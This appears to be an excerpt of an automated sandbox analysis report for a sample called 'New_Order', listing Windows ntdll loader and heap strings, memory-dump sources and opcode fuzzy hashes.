                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $@
                                                                                                • API String ID: 0-1077428164
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                                                • API String ID: 0-2779062949
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 012EA121
                                                                                                • LdrpCheckModule, xrefs: 012EA117
                                                                                                • Failed to allocated memory for shimmed module list, xrefs: 012EA10F
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                • API String ID: 0-161242083
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                • API String ID: 0-1334570610
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 012F82E8
                                                                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 012F82DE
                                                                                                • Failed to reallocate the system dirs string !, xrefs: 012F82D7
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                • API String ID: 0-1783798831
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • @, xrefs: 0133C1F1
                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0133C1C5
                                                                                                • PreferredUILanguages, xrefs: 0133C212
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                • API String ID: 0-2968386058
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                • API String ID: 0-1373925480
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01304899
                                                                                                • LdrpCheckRedirection, xrefs: 0130488F
                                                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01304888
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                • API String ID: 0-3154609507
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                • API String ID: 0-2558761708
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01302104
                                                                                                • Process initialization failed with status 0x%08lx, xrefs: 013020F3
                                                                                                • LdrpInitializationFailure, xrefs: 013020FA
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                • API String ID: 0-2986994758
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___swprintf_l
                                                                                                • String ID: #%u
                                                                                                • API String ID: 48624451-232158463
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • LdrResSearchResource Enter, xrefs: 0128AA13
                                                                                                • LdrResSearchResource Exit, xrefs: 0128AA25
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                • API String ID: 0-4066393604
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `$`
                                                                                                • API String ID: 0-197956300
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID: Legacy$UEFI
                                                                                                • API String ID: 2994545307-634100481
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @$MUI
                                                                                                • API String ID: 0-17815947
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0128063D
                                                                                                • kLsE, xrefs: 01280540
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                • API String ID: 0-2547482624
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 0128A309
                                                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 0128A2FB
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                • API String ID: 0-2876891731
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID: Cleanup Group$Threadpool!
                                                                                                • API String ID: 2994545307-4008356553
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: MUI
                                                                                                • API String ID: 0-1339004836
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID: 0-3916222277
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID: 0-3916222277
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: GlobalTags
                                                                                                • API String ID: 0-1106856819
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: .mui
                                                                                                • API String ID: 0-1199573805
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: EXT-
                                                                                                • API String ID: 0-1948896318
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: BinaryHash
                                                                                                • API String ID: 0-2202222882
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: #
                                                                                                • API String ID: 0-1885708031
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: BinaryName
                                                                                                • API String ID: 0-215506332
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0130895E
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                • API String ID: 0-702105204
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                • Instruction ID: 575b83504363ac7cd84fe5f18d19939ee2d7eadc47a385a297045c7977b51a63
                                                                                                • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                • Instruction Fuzzy Hash: 16B15274E006059FDF26DF99C990AABBBF9FF84308F1444ADAA42977D1DA34E905CB10
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                • Instruction ID: f8d1de34fbb0db93f7697e2d2f9afebee105636677f250860c5a80c61b893d7d
                                                                                                • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                • Instruction Fuzzy Hash: E2B1253162064AAFDF25DB6CC854BBEBBFABF88300F544158E652D7281DB70E941CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: adcca47a2b272b82b5117d3557b7ba62c5bef3e229ac018b24d50d0115a10829
                                                                                                • Instruction ID: c2af23926d002c8850e836db5a8216f4544448b1fd7e7e37ad340d579bac3304
                                                                                                • Opcode Fuzzy Hash: adcca47a2b272b82b5117d3557b7ba62c5bef3e229ac018b24d50d0115a10829
                                                                                                • Instruction Fuzzy Hash: 52C15874128341CFD764DF19C494BAAB7E5FF88304F84492DEA8987291D774E904CFA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 49bfafa2d352c245260649a1261f1e5b52c8e514b9e7379f03a8c9ca31104d1a
                                                                                                • Instruction ID: 09f705551c801913aa8919d8fa4b0c8350139e5b3f11e39589084d266b6fac13
                                                                                                • Opcode Fuzzy Hash: 49bfafa2d352c245260649a1261f1e5b52c8e514b9e7379f03a8c9ca31104d1a
                                                                                                • Instruction Fuzzy Hash: 87B17170A202678BDB34DF69D890BBAB7B5EF44704F0485E9D50AE7241EB71DD85CB20
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0528d988cc6c2e1fe188cd40515d2c71e4d3693a8345374a4ca2d998e20d2a51
                                                                                                • Instruction ID: deeaab5e3b4095fdb6484d95b6707c7093b4e198ff97b5e0539bb41e486d8d48
                                                                                                • Opcode Fuzzy Hash: 0528d988cc6c2e1fe188cd40515d2c71e4d3693a8345374a4ca2d998e20d2a51
                                                                                                • Instruction Fuzzy Hash: 8BA12631E206169FEB25DB5CC948BAEBBF4BB04B14F560165EB00AB2C0D7749D41CBD1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c129da461e74834968d9f723351df64de831d78b66d65c16201e5e39498d201c
                                                                                                • Instruction ID: 92dc3cde03598aa95c91d431fead5fd7cedb5a5f57bcc8dc13ea7bb2ed51c49a
                                                                                                • Opcode Fuzzy Hash: c129da461e74834968d9f723351df64de831d78b66d65c16201e5e39498d201c
                                                                                                • Instruction Fuzzy Hash: DDA1D074A20616DFDB25DF69C891BBAB7B5FF44B18F00422DFB05A7281DB74A841CB84
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 611283bc90f9586177044102af0cc3d4a93246de12d913ecc9a408813e85d9a4
                                                                                                • Instruction ID: 546b5da00aee805cada8d18f3b0784d51b77ba8614f3d128c8621563a29170a0
                                                                                                • Opcode Fuzzy Hash: 611283bc90f9586177044102af0cc3d4a93246de12d913ecc9a408813e85d9a4
                                                                                                • Instruction Fuzzy Hash: 3FA1E072614601EFD729DF18C980F6ABBE9FF48B18F04092CE94997650E334ED40CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 540dc1849dac174ae0de21313b776b39ea82fe3ee3b489511b8d30f49da8850e
                                                                                                • Instruction ID: fdd1c5455ddf09db1b937f5b9efd541daf24c9392e2d6a07e78fd25ca8193beb
                                                                                                • Opcode Fuzzy Hash: 540dc1849dac174ae0de21313b776b39ea82fe3ee3b489511b8d30f49da8850e
                                                                                                • Instruction Fuzzy Hash: 8391B3B1D0021AAFDF16CF68D8A1BBEBFF9AF48314F144159E610AB395D734D9108BA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1a677fd8b6c469345894a5cd557021214bc8e5d209bbce58a453a92968a6b0b1
                                                                                                • Instruction ID: 06282bb7254c39d0f51f5c38eb68edd0298cd4358f24b4736c59de24e6c55f3e
                                                                                                • Opcode Fuzzy Hash: 1a677fd8b6c469345894a5cd557021214bc8e5d209bbce58a453a92968a6b0b1
                                                                                                • Instruction Fuzzy Hash: CD915471A20616DBEF24DB2DD485BBE7BE1EF94714F06406AEA059B380E634D841C7A1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d2d4820397c0a5619732b0ca30b01f2808e81f1aed76124f4362a4199efaf0aa
                                                                                                • Instruction ID: 854e77eef5166c38e1efefc1845b21575616fbacf9bae1dbcbf3b162139cc7f3
                                                                                                • Opcode Fuzzy Hash: d2d4820397c0a5619732b0ca30b01f2808e81f1aed76124f4362a4199efaf0aa
                                                                                                • Instruction Fuzzy Hash: 2D81A571E106169FDB28CFA9D890ABEBBF9FB58700F14852EE545E7640E334D940CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                • Instruction ID: 564e12d4db9c22f8d7fbb43f5babb7bd0fe2be2268991aeec2698c5044d879c5
                                                                                                • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                • Instruction Fuzzy Hash: 02818071A102099FDF19CF98C890AAEBBF6FF88318F188569D9169B385D734E901CB54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9a7e0e8092fb03d36406d4d0051a65fa04bffacfd869b5001ede92f8039cbd8e
                                                                                                • Instruction ID: 8959981f284f1d4824a93b1c83fa6840a3a773d5a9498ef97f31067c87921ab6
                                                                                                • Opcode Fuzzy Hash: 9a7e0e8092fb03d36406d4d0051a65fa04bffacfd869b5001ede92f8039cbd8e
                                                                                                • Instruction Fuzzy Hash: 58718C716247439BDF21DF29C981B6BB7E8BB48358F14492AFA55D7200E730E9C4CB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 74585c1d0e42d10b4474c69121b0fee311bffdc0b05465f0c2bdefdc06000d4f
                                                                                                • Instruction ID: e88be474e0e8a13fd17e698615b6c60677c64358267c4e2df62cd0df8dba9131
                                                                                                • Opcode Fuzzy Hash: 74585c1d0e42d10b4474c69121b0fee311bffdc0b05465f0c2bdefdc06000d4f
                                                                                                • Instruction Fuzzy Hash: 1E816F71A1060AEFDB25CFA9C880BEEBBB9FF48354F11442DE655A7250DB70AC45CB60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7bd940b93c9a5dc5b49bcd312be26c455827e5d0b96400091a87e94348babcc9
                                                                                                • Instruction ID: b3e58f069fcc753598828484650be936b74978054b94e93f1d719daa5be5fd89
                                                                                                • Opcode Fuzzy Hash: 7bd940b93c9a5dc5b49bcd312be26c455827e5d0b96400091a87e94348babcc9
                                                                                                • Instruction Fuzzy Hash: 4D71BE75C2466ADBDB298F68C4917FEBBF8FF58710F54411AE982AB350D3719810CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cac4364ead5d459158efe9e0487446e64c22deeb2d239b99f9d0c9f8a7578616
                                                                                                • Instruction ID: d0ec18287656b663b9d08ee83869af4b03072464f2bacff2b0fe31b7bcee1d00
                                                                                                • Opcode Fuzzy Hash: cac4364ead5d459158efe9e0487446e64c22deeb2d239b99f9d0c9f8a7578616
                                                                                                • Instruction Fuzzy Hash: 4071A0B0910606EFEB30CF99DA55A9ABBF8FFD0308F00419EE604AB258C7318945CF58
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cf0c3e9cad6982fd8851d9adbd425c0cc6a675853e7e3ace211668803b486629
                                                                                                • Instruction ID: e53b283db770ee7f378a450a0c068d75dd8abbbc1df656013ace790982578b02
                                                                                                • Opcode Fuzzy Hash: cf0c3e9cad6982fd8851d9adbd425c0cc6a675853e7e3ace211668803b486629
                                                                                                • Instruction Fuzzy Hash: B1418531A216299FDF21EF6CC940BEE77B8EF55740F0100A5EA08AB281DB749E84CB55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
